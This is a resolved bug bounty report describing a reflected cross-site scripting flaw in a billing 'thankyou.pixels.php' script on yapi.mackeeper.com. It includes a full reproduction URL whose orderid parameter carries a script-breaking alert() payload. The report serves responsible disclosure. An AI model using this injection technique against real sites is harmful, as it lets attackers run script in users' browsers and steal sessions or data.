RXSS on thankyou.pixels.php (yapi.mackeeper.com)
Team Summary
Official summary from Clario
### Summary Reflected Cross-Site Scripting attack on yapi.mackeeper.com domain. The problem in `/billing/thankyou.pixels.php` script that passes a value of vulnerable parameter directly to HTML code of the page. ### Step to reproduce `https://yapi.mackeeper.com/billing/thankyou.pixels.php?source=ppg&amount=118.800000&orderid=930799331063'}});</script><script>alert(document.domain)</script>%3balert(1)%2f%2f663&customerid=3250462&quantity=1&clid=185.11394286.1432610720.6.mzb&affid=mzb_2416&xprepay=bn_mk_ppi_kyloren_ppg&productId=29&item1=11559&amount1=118.800000&status=paid`
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$75.00
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected